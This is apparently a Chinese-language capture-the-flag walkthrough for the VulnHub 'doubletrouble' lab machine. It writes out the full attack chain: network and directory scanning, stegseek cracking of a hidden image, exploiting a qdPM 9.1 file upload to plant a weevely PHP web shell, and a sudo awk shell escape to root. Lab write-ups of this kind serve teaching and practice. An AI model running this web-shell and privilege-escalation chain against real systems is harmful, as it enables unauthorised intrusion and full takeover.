vulnhub-doubletrouble

靶机:http://www.vulnhub.com/entry/doubletrouble-1,743/
网络模式:nat
攻击机kali(nat)
1,扫描靶机IP
2,扫描存活端口
3,目录扫描,查看有用的信息
sudo arp-scan -l扫描同网段的靶机ip

vulnhub-doubletrouble_第1张图片

nmap -P 1-65535 -A 192.168.6.13722,80端口

vulnhub-doubletrouble_第2张图片

访问

vulnhub-doubletrouble_第3张图片

dirb http://192.168.6.137扫描目录看到两个比较特殊的文件secret,uploads

vulnhub-doubletrouble_第4张图片

访问,看到一张图片,查看图片下载下来

vulnhub-doubletrouble_第5张图片

secret下的图片可能是图片隐写,我们用stegseek暴力破解(工具安装steghide)apt-get install steghide
stegseek /home/kali/doubletrouble.jpg /usr/share/wordlists/rockyou.txt rockyou.txt文件需要解压

vulnhub-doubletrouble_第6张图片

提示说提取到.out,cat doubletrouble.jpg.out

vulnhub-doubletrouble_第7张图片

账号密码登录qdPM9.1,搜索qdPM9.1有上传文件漏洞,在这里上传文件

vulnhub-doubletrouble_第8张图片

sudo weevely generate 123 ./dd.php
weevely generate 密码 文件名

vulnhub-doubletrouble_第9张图片###### 然后再上面qdPM上传dd.php,上传后访问/uploads
vulnhub-doubletrouble_第10张图片

进入attachments目录,看到文件

vulnhub-doubletrouble_第11张图片

kali终端weevely http://192.168.6.137/uploads/attachments/348814-dd.php 123点击uploads的dd.php文件,拿到shell

vulnhub-doubletrouble_第12张图片

sudo -l可以免密执行awk,sudo awk 'BEGIN {system("/bin/sh")}'拿到权限
cd root ls看到flag

vulnhub-doubletrouble_第13张图片

你可能感兴趣的:(linux,网络,渗透测试)